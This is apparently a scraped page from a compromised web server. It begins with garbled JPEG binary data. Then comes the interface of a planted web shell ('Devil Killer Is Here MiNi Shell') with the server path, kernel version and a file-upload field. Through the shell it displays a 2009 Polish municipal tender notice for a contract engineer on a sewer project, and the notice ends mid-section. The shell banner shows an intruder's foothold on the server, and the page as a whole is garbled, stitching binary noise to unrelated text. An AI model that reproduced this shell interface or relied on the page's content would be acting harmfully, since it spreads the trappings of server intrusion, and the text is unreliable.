JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090121/23067-N-2009.html

<p class="kh_header"><b>Orchowo: Przetarg nieograniczony na usługę polegającą na pełnieniu funkcji Inżyniera Kontraktu dla projektu: Budowa kanalizacji sanitarnej z przykanalikami w miejscowości Osówiec - Orchowo, gm. Orchowo, woj. Wielkopolskie.</b><br>
<b>Numer ogłoszenia: 23067 - 2009; data zamieszczenia: 21.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Orchowo , ul. Tadeusza Kościuszki 6, 62-436 Orchowo, woj. wielkopolskie, tel. 063 2684090, faks 063 2684090.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ug@orchowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na usługę polegającą na pełnieniu funkcji Inżyniera Kontraktu dla projektu: Budowa kanalizacji sanitarnej z przykanalikami w miejscowości Osówiec - Orchowo, gm. Orchowo, woj. Wielkopolskie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.1. Przedmiotem zamówienia jest usługa polegająca na pełnieniu funkcji Inżyniera Kontraktu zgodnie z poniższymi zadaniami i obowiązkami: 
4.1.1. Inżynier Kontraktu działa w imieniu Zamawiającego i odpowiada za realizację Inwestycji zgodnie z przepisami Prawa Budowlanego, ustawy Prawo Zamówień Publicznych, warunkami określonymi w umowie z Wykonawcą robót oraz w umowie o dofinansowanie inwestycji ze środków Mechanizmu Finansowego EOG/Norweskiego Mechanizmu Finansowego. 
4.1.2. Inżynier Kontraktu spełnia swoją funkcję przy pomocy wieloosobowego zespołu nadzoru, którym kieruje i za pracę którego odpowiada. 
4.1.3. W skład Zespołu Inżyniera Kontraktu wchodzą m.in. :
a) Inżynier Rezydent, 
b) Inspektor nadzoru w branży wodno- kanalizacyjnej, 
c) Inspektor Nadzoru w branży elektrycznej 
4.1.4. Czas pracy zespołu Inżyniera Kontraktu winien zostać dostosowany do czasu pracy wykonawcy robót, zakłada się w tym okresie ciągły pobyt pracowników przewidzianych do bezpośredniego nadzorowania robót na budowie oraz w zależności od potrzeb innych pracowników. Zamawiający wymaga także zorganizowania stałej dostępności do Inżyniera Rezydenta. 
4.1.5. Wszystkie czynności nadzoru wykonywane przez Zespół Inżyniera Kontraktu muszą być zgodne z obowiązującymi przepisami Prawa Polskiego, w szczególności ustawą z dnia 7 lipca 1994 Prawo Budowlane(z późniejszymi zmianami), ustawą Prawo Zamówień Publicznych, Kodeksem Cywilnym oraz wymaganiami ustalonymi w umowach na realizację robót. 
4.1.6. Zadania i obowiązki Inżyniera Kontraktu- wymagania szczegółowe dotyczące projektu:Budowa kanalizacji sanitarnej z przykanalikami w miejscowości Osówiec - Orchowo, gm. Orchowo, woj. wielkopolskie- w okresie przygotowania do rozpoczęcia przetargu: WYKONAWCA ZOSTANIE WYŁONIONY W TRYBIE PRZETARGU NIEOGRANICZONEGO PRZEZ INWESTORA PRZY POMOCY INŻYNIERA KONTRAKTU  
4.2.  zorganizowanie i prowadzenie procesu przekazania placu budowy; 
4.3. opiniowanie listy Podwykonawców zaproponowanych przez Wykonawcę pod względem zgodności z wymogami określonymi w materiałach przetargowych; 
4.4. opiniowanie wniosków Wykonawcy w sprawie dokonania zmian personelu wskazanego w ofercie i przedłożenie jej Zamawiającemu do zatwierdzenia; 
4.5. opiniowanie Programu Zapewnienia Jakości oraz Planu Bezpieczeństwa i Ochrony Zdrowia przedstawionego przez Wykonawcę przed rozpoczęciem robót; 
4.6. uzgodnienie z Wykonawcą procedur (wzory druków i obieg dokumentów) jakie będą obowiązywać podczas procesu prowadzenia inwestycji; 
4.7. analizowanie harmonogramu robót, wnioskowanie do wykonawcy robót o jego korektę bądź zmianę i przedkładanie Zamawiającemu do zatwierdzenia; 
4.8. bieżąca kontrola zgodności wykonywanych prac z harmonogramem; 
4.9. weryfikowanie i zatwierdzanie Wykonawcy wszelkich źródeł pozyskiwania materiałów wbudowywanych na podstawie dostarczonych przez Wykonawcę wszelkich dla nich koniecznych prób i testów; 
4.10. wnioskowanie w sprawie niezbędnych zmian w dokumentacji projektowej; 
4.11. koordynowanie prowadzenia nadzoru autorskiego przez projektantów, stwierdzanie konieczności pobytu projektanta na budowie oraz potwierdzanie wykonania nadzoru; 
4.12. wnioskowanie o wykonanie niezbędnych badań technicznych i ekspertyz; 
4.13. podejmowanie decyzji o dopuszczeniu do stosowania (lub odrzuceniu) receptur, materiałów, prefabrykatów, w tym mieszanek mineralno - bitumicznych, betonów do wszystkich elementów, sprzętu i urządzeń przewidzianych do realizacji robót w oparciu o przepisy normy i wymagania sformułowane w umowie z Wykonawcą, w dokumentacji projektowej i Specyfikacjach Technicznych; 
4.14. prowadzenie kontroli bieżącej materiałów, prefabrykatów, technologii budowy w celu sprawdzenia zgodności i akceptacji stosownych metod budowy, kontroluje sposób składowania i przechowywania materiałów oraz uporządkowanie miejsc składowania po zakończeniu robót; 
4.15. zatwierdzanie materiałów, technologii budowlanych oraz jakości wykonania zgodnie z warunkami kontraktów i dokumentacją projektową dla wszystkich asortymentów robót; 
4.16. sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i badaniach oraz odbiorach końcowych i przekazywanie ich do użytkowania; 
4.17. dokonywanie odbiorów częściowych, odbioru końcowego- ostatecznego, odbioru pogwarancyjnego;
4.18. wydawanie poleceń kierownikowi budowy dotyczących usunięcia nieprawidłowości lub zagrożeń, które skutkować mogłyby zagrożeniem bezpieczeństwa lub spowodować niedopuszczalną niezgodność z projektem czy pozwoleniem na budowę; 
4.19. kontrolowanie ilości i wartości prowadzonych robót na poszczególnych zadaniach w okresach miesięcznych; finansowe rozliczenie poszczególnych zadań oraz potwierdzanie protokołów odbioru urządzeń lub przyjęcia materiałów, z podaniem miejsca ich składowania; 
4.20. uczestniczenie w kontrolach przeprowadzanych przez Nadzór Budowlany i inne organy uprawnione do kontroli oraz sprawdzanie realizacji ustaleń i decyzji podjętych podczas tych kontroli; 
4.21. uczestniczenie w uzupełnianiu i składaniu informacji i dodatkowych wyjaśnień związanych z realizacją Projektu do Instytucji Zarządzającej w przypadku wystąpienia takiej potrzeby; 
4.22. udział w przeglądach gwarancyjnych prowadzonych zgodnie z warunkami umowy; 
4.23. udzielanie opinii i sprawdzania dokumentacji projektowej w zakresie przyjętych rozwiązań projektowych, ich wykonalności, Szczegółowych Specyfikacji Technicznych dla robót, technologii robót, zastosowania materiałów, itp.; 
4.24. powiadamianie właściwych urzędów i załatwianie niezbędnych formalności w przypadku odkrycia wykopalisk; 
4.25. wnioskowanie o przesunięcie planowanego terminu zakończenia robót w uzasadnionych przypadkach oraz opiniowanie wnioskowanego przez wykonawcę skrócenia terminu wykonania prac; 
4.26. potwierdzanie dopuszczenia do pracy sprzętu, urządzeń i narzędzi przewidzianych do realizacji robót w oparciu o obowiązujące przepisy, normy techniczne i inne wymagania sformułowane w Warunkach Kontraktu, dokumentacji projektowej i Specyfikacjach Technicznych, a także w przepisach BHP i p/poż.; 
4.27. zlecanie usunięcia robót niewłaściwych i wykonanych poniżej obowiązującego standardu; 
4.28. kontrolowanie wykonania robót w zakresie zgodności z rysunkami, specyfikacjami i warunkami Umowy; 
4.29. zlecanie w uzasadnionych przypadkach wykonania przez Wykonawcę: - sprawdzenia punktów głównych wytyczonych obiektów, - dokonywanie ocen geologicznych w sytuacjach tego wymagających, - w sytuacjach budzących wątpliwości odnośnie wyników badań zlecanie Wykonawcy wykonania kontrolnych badań polowych i laboratoryjnych; 
4.30. wydawanie poleceń Wykonawcy do wykonania robót lub podjęcia niezbędnych przedsięwzięć jakie mogą być konieczne, aby uniknąć lub zmniejszyć ryzyko w przypadku jakiejkolwiek awarii mającej wpływ na bezpieczeństwo życia lub przylegającego majątku oraz powiadamianie o tym Zamawiającego; 
4.31. organizowanie przynajmniej raz w miesiącu i prowadzenie Rady Budowy, sporządzanie z nich protokołów z podjętymi ustaleniami i przekazywanie ich zainteresowanym stronom w terminie do 3 dni po naradzie. Organizowanie Roboczych narad w zależności od potrzeb, jednakże nie rzadziej niż co miesiąc, sporządzanie z nich protokołów z podjętymi ustaleniami; 
4.32. przygotowywanie i przekazywanie Zamawiającemu we wskazanych przez niego terminach wszelkich sprawozdań i dokumentów wynikających z umowy zawartej z Instytucją Zarządzającą w terminach umożliwiających Zamawiającemu wywiązanie się z zobowiązań umownych, tj. m.in.: 
- harmonogram składania wniosków o płatność na cały okres realizacji projektu,
 - miesięczne raporty z postępu robót, 
- okresowe wnioski o płatność, 
- poświadczone kwartalne świadectwa płatności wystawione przez Wykonawcę robót,
- sprawozdania wykonane zgodnie z właściwymi procedurami unijnymi, 
- raport końcowy,
4.33. sprawdzanie miesięcznych zestawień wykonanych robót Wykonawcy i potwierdzenia ilości wykonanych robót i kwoty do wypłaty w terminie do 7 dni od złożenia zestawienia przez Wykonawcę; 
4.34. przyjmowanie, opiniowanie wniosków Wykonawcy robót w sytuacji, kiedy wystąpi konieczność wykonania robót nieprzewidzianych w umowie, warunkujących jednak zakończenie zadania inwestycyjnego, weryfikowanie kosztorysów ofertowych Wykonawcy na powyższy zakres; 
4.35. sporządzanie protokołów konieczności na roboty dodatkowe i zamienne po uprzednim zaakceptowaniu ich przez Zamawiającego; 
4.36. kontrolowanie prawidłowego prowadzenia Dziennika Budowy i Ksiąg Obmiaru, prawidłowego gromadzenia atestów materiałów, orzeczeń o jakości materiałów, kontrolnych wyników badań i innych dokumentów stanowiących załączniki do odbioru robót; 
4.37. prawidłowe przechowywanie wszystkich dokumentów budowy; 
4.38. opracowywanie dla Zamawiającego informacji z realizowanego zadania inwestycyjnego; 
4.39. stwierdzenie zakończenia robót, przeprowadzenie odbioru wewnętrznego robót z udziałem przedstawiciela Zamawiającego, sporządzenie listy ewentualnych usterek i wyznaczenie czasu do ich usunięcia przez Wykonawcę; 
4.40. wyznaczenie terminu odbioru końcowego robót i powiadamianie o tym wszystkie zainteresowane strony; 
4.41. nadzorowanie przygotowania 2 kompletów archiwalnych dokumentacji po wykonawczych z wszystkimi wymaganymi rysunkami roboczymi i warsztatowymi; 
4.42. sprawdzenie kompletności i prawidłowości operatu kolaudacyjnego oraz przedłożenie go Zamawiającemu; 
4.43. dokonanie wraz z Zamawiającym odbioru usunięcia usterek, sporządzenie raportu usunięcia usterek, przedstawienie Zamawiającemu i Wykonawcy potwierdzenia zakończenia robót; 
4.44. przygotowanie opinii technicznej zrealizowanego zadania inwestycyjnego; 
4.45. udział w przekazaniu robót wraz z wymaganą dokumentacją poszczególnym Gestorom Sieci na warunkach określonych przez nich w trakcie uzgadniania dokumentacji; 
4.46. współpraca z Zamawiającym w zakresie prawidłowego utrzymania dróg w rejonie budowy, dróg przyległych jak i objazdowych. W przypadku ewentualnych powstałych zdarzeń w trakcie prowadzenia budowy Inżynier Kontraktu przygotowuje dla Zamawiającego propozycje koniecznych działań. Przedmiotem Projektu dla którego pełniony będzie nadzór przez Inżyniera Kontraktu  jest budowa sieci kanalizacyjnej. Zakres inwestycji obejmuje sieć kanalizacyjną z przykanalikami z miejscowości Osówiec - Orchowo, gm. Orchowo, woj. wielkopolskie:
Kolektory sanitarne - grawitacyjne 9363 mb.
Rurociągi tłoczne ciśnieniowe 2757 mb.
Przykanaliki 2186 mb.
Ostatni człon sieci stanowić będą przepompownie P1, P2, P3 o wydajności od 150 - 300 m3/d, z których ścieki z całego Orchowa będą tłoczone do istniejącej oczyszczalni ścieków w Osówcu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3, 71.35.62.00-0, 71.52.00.00-9, 71.54.10.00-2, 71.63.13.00-3, 72.22.40.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Każda oferta musi być zabezpieczona wadium o wartości: 6 000 zł.
2.Wadium może być wniesione w jednej lub kilku następujących formach: 
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
c) gwarancjach bankowych, 
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu polskiej Agencji Rozwoju Przedsiębiorczości   (Dz. U. z 2007 Nr. 42, poz. 275 z późn. zm.) 
3.Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy zamawiającego: LBS Strzałkowo o/Orchowo nr 51854300002003300001010001 Kserokopię wpłaty należy dołączyć do oferty. 
4.W przypadku wniesienia wadium w innej formie niż pieniądzu (poręczenie, gwarancja) zatwierdzonej przez zamawiającego, odpowiednie dokumenty w formie oryginału muszą być złożone za potwierdzeniem w kasie Urzędu Gminy w terminie składania oferty. 
5.Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy PZP 
6.Wadium musi być wniesione przed upływem terminu składania ofert najpóźniej do dnia 30.01.2009 r., przed godz.08.00.(tak aby kserokopię wpłaty dołączyć do oferty) Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego. 
7.Wniesione wadium musi obejmować okres związania ofertą. 
8.Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną przez zamawiającego formą wadium zostanie przez zamawiającego wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą. Zamawiający zwraca niezwłocznie wadium, jeżeli: 
1. upłynął termin związania ofertą, 
2. zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania umowy, 
3. zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia. 
9.Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy: 
1. który wycofał ofertę przed upływem terminu do składania ofert, 
2. który został wykluczony z postępowania, 
3. którego oferta została odrzucona. 
10.Złożenie przez wykonawcę, którego oferta została odrzucona lub wykluczonego z postępowania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez wykonawcę prawa do wniesienia protestu. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana : 
1. odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
2. nie wniósł zabezpieczenia należytego wykonania umowy, 
3. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunkiem ubiegania się przez oferenta o udzielenie zamówienia publicznego jest:
1. W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24 ust. 1 PZP oraz spełniający wymogi art. 22 ust. 1 PZP, tj: 
1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
1.2. posiadają niezbędną wiedzę i doświadczenia oraz dysponują potencjałem technicznymi osobami zdolnymi do wykonania zamówienia, 
1.3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
1.4. nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 PZP. 
2. Wykonawca musi znajdować się w sytuacji ekonomicznej i organizacyjnej zapewniającej wykonanie zamówienia, tzn. musi wykazać że: 
2.1. posiada dostęp lub dysponuje środkami finansowymi o wartości min. 40.000zł, 
2.2. posiada polisę ubezpieczeniową potwierdzającą, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej w wysokości nie mniejszej niż 100.000 zł lub oświadczenie o jej zawarciu, 
2.3. zrealizował w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie w charakterze samodzielnego Wykonawcy lub jednego z Wykonawców wspólnie ubiegających się o zamówienie, przynajmniej dwie usługi prowadzenia obsługi zadań w ramach której nadzorował roboty budowlane odpowiadające rodzajem i wartością (min. 10.000zł) usłudze stanowiącej przedmiot zamówienia, wraz z potwierdzeniem należytego wykonania, 
2.4. dysponuje następującymi osobami posiadającymi uprawnienia budowlane i należącymi do Okręgowej Izby Inżynierów Budownictwa:- Kierownik Zespołu Nadzoru - Inżynier Rezydent. Uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych Uprawnienia budowlane - min. 5 lat Doświadczenie na stanowisku Inżyniera Rezydenta lub Inspektora nadzoru przy zadaniu o zakresie robót podobnym do przedmiotu zamówienia - Inspektor nadzoru w branży wod.- kanalizacyjnej. Uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych. Uprawnienia budowlane - min. 5 lat Doświadczenie przy realizacji lub nadzorze robót- min. 5 lat - Inspektor Nadzoru w branży elektrycznej. Uprawnienia budowlane w specjalności instalacji elektrycznych. Uprawnienia budowlane min.5 lat Doświadczenie przy realizacji lub nadzorze robót- min.5 lat - UWAGA - Zamawiający nie wyklucza sytuacji (łączenia stanowisk), tzn. wskazana osoba może jednocześnie pełnić funkcję na przykład: Inspektora nadzoru inwestorskiego robót sieci kanalizacyjnych i Inspektora nadzoru inwestorskiego w branży elektrycznej pod warunkiem, że osoba taka jednocześnie spełnia wymagania dotyczące obu stanowisk, - Wykonawca zobowiązany jest do zapewnienia obsługi zadania przez wskazane w ofercie osoby. Zamawiający nie wyrazi zgody na zmiany personalne bez zaistnienia istotnej przyczyny np.: rozwiązania umowy o pracę ze wskazanym w ofercie pracownikiem, wyjazdu zagranicznego itp., - Wykonawca dla każdej z osób wymienionych w tabeli powyższej przedstawi skrócone CV dla udokumentowania doświadczenia zawodowego.
3. Zamawiający będzie oceniał powyższe warunki na podstawie dokumentów, o których mowa w pkt 9 niniejszej SIWZ. Oferta musi być zgodna ze wszystkimi wymogami SIWZ oraz PZP...</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Każdy wykonawca przystępujący do postępowania powinien złożyć oświadczenie, że:
a)posiada uprawnienia do wykonywania działalności lub czynności będących przedmiotem zamówienia
b)posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia,
c)znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)nie podlega wykluczeniu z postępowania o udzielenie zamówienia.
Wzór oświadczenia stanowi załącznik nr 2 do specyfikacji.
2. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania działalności  lub czynności objętych zamówieniem oraz nie podlega wykluczeniu na podstawie art. 24 ustawy zamawiający żąda, w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę, następujących dokumentów:
2.1.Postanowienia dotyczące wnoszenia ofert  przez jeden podmiot gospodarczy:
2.1.1. formularz ofertowy - załącznik nr 1 do SIWZ,
2.1.2. oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne zgodnie z art. 22 ust. 1 uPzp - załącznik nr 2 do SIWZ,
2.1.3. kserokopie wniesienia wadium, 
2.1.4. aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2.1.5. aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
2.1.6. wykaz wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającym swoim rodzajem i wartością (min. 10.000zł) usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Wykaz wykonanych usług powinien zostać sporządzony zgodnie ze wzorem, który stanowi załącznik nr 6 SIWZ; 
2.1.7. dokumenty potwierdzające należyte wykonanie usług wymienionych w ww. wykazie. Dokumenty należy przedstawić w kolejności zgodnej z wykazem; 
2.1.8. imienny wykaz osób które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia (sporządzony zgodnie z załącznikiem nr 4 do SIWZ) wraz z załączonymi CV - załącznik Nr 5; 
2.1.9. kserokopie: uprawnień budowlanych oraz zaświadczeń o przynależności do Okręgowej Izby Inżynierów Budownictwa osób wymienionych w wykazie osób uczestniczących w wykonaniu zamówienia; Jeżeli po otrzymaniu dokumentu potwierdzającego uprawnienia budowlane, osoba zmieniła imię lub nazwisko do oferty należy załączyć poświadczoną za zgodność kopię dokumentu potwierdzającego tę zmianę; 
2.1.10. informacje z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w której Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
2.1.11. polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności; 
2.1.12. oświadczenie Wykonawcy o zakresie usług do wykonania przez Podwykonawcę zgodnie z załącznikiem Nr 7 SIWZ. 
3.Postanowienia dotyczące wnoszenia ofert wspólnie przez dwa lub więcej podmiotów gospodarczych (konsorcja/spółki cywilne): 
